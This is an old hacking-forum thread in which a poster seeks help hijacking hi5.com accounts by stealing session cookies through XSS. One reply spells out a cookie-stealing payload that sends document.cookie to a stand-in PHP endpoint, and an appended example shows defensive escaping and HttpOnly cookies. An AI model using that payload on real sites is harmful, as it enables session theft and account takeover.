diego018 Posted September 15, 2008
Hi hackers. The social network site hi5.com allows you to place codes like YouTube scripts, etc. in your profile. I know that with a special function. <script>alert(document.cookie)</script> and if we create a special page in a webserver written in PHP to store the cookies, we can access as some user via their cookies. Here is some info I have found: http://www.pabrantes.net/blog/comments/start/2006-05-01/1 (don't know if it still works). I don't know where to start, hope that you can give me some ideas. The only thing that I don't know how to do is how to retrieve the cookies; I know how to save them via a PHP file and a txt file.

DingleBerries Posted September 15, 2008
In before thread locked

Swathe Posted September 15, 2008

Emilml Posted September 15, 2008
In before thread locked Me2!

snakey Posted September 15, 2008
pretty much failed at the locking call :P

psydT0ne Posted September 15, 2008
OK... what exactly is this guy on about... and yes I'm clueless etc etc....

digip Posted September 15, 2008
<script>alert(document.cookie)</script> only shows you YOUR cookie. It doesn't log a user's cookies from another site while visiting your site. It only shows the cookie for the page you are on and if the page you are on has set a cookie.

For example, go to any site that uses cookies and type in your address bar the following:
java script:alert(unescape(document.cookie)); (remove the space in "javascript")
It will show you YOUR cookie.

To steal a cookie, the site must have a flaw to allow an XSS attack of some sort, like:
<a href="#" onclick="window.location='http://example.com/somescript.php?cookie='+escape(document.cookie); return false;">Click here!</a>
And this only works if you can insert this on a foreign site other than your own, and chances are, won't work if the site knows what they are doing. They should remove any scripting in a post or comment field.

The method you describe, <script>alert(document.cookie)</script>, is not going to work just by having them visit your page. Look at the link you posted, as they describe in more detail what is going on. Also, that post is from like 2006, so if they are still vulnerable to that sort of attack, I can't imagine they would still be afloat with such XSS attacks made so easy on their system.
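
Added example, not part of the thread and not hi5's code: one way a site can apply the advice above (remove scripting from profile and comment fields) while still allowing video embeds. The user submits a link rather than markup, the server builds the embed itself, and the session cookie is marked HttpOnly. The names ALLOWED_HOSTS, youtubeId, renderProfileField and sessionCookie are hypothetical, and the sample inputs are constructed.

```javascript
// Added example: user-supplied profile content is never emitted as raw HTML.
// All names here are hypothetical; sample inputs below are constructed.
const ALLOWED_HOSTS = new Set(["www.youtube.com", "youtube.com", "youtu.be"]);
const VIDEO_ID = /^[A-Za-z0-9_-]{11}$/;

// Encode the characters that let text break out of HTML text or attribute context.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

// Return the video id if the input is an https link to an allowed host, else null.
function youtubeId(input) {
  let url;
  try { url = new URL(String(input).trim()); } catch { return null; }
  if (url.protocol !== "https:" || !ALLOWED_HOSTS.has(url.hostname)) return null;
  const id = url.hostname === "youtu.be" ? url.pathname.slice(1) : url.searchParams.get("v");
  return id && VIDEO_ID.test(id) ? id : null;
}

// The server builds the iframe from a validated id; anything else is
// rendered as inert, escaped text instead of markup.
function renderProfileField(input) {
  const id = youtubeId(input);
  if (id) return `<iframe src="https://www.youtube.com/embed/${id}"></iframe>`;
  return `<p>${escapeHtml(input)}</p>`;
}

// HttpOnly keeps the session cookie out of document.cookie, so a script that
// slips past the filter still cannot read it.
function sessionCookie(value) {
  return `session=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed inputs: a valid link, plus the two snippets quoted in the thread.
const samples = [
  "https://www.youtube.com/watch?v=abcDEF12345",
  "<script>alert(document.cookie)</script>",
  `<a href="#" onclick="window.location='http://example.com/somescript.php?cookie='+escape(document.cookie); return false;">Click here!</a>`,
];
for (const s of samples) console.log(renderProfileField(s));
console.log(sessionCookie("constructed-session-id"));
```

Both snippets from the thread come out as visible text rather than executable markup, and only the validated link becomes an embed.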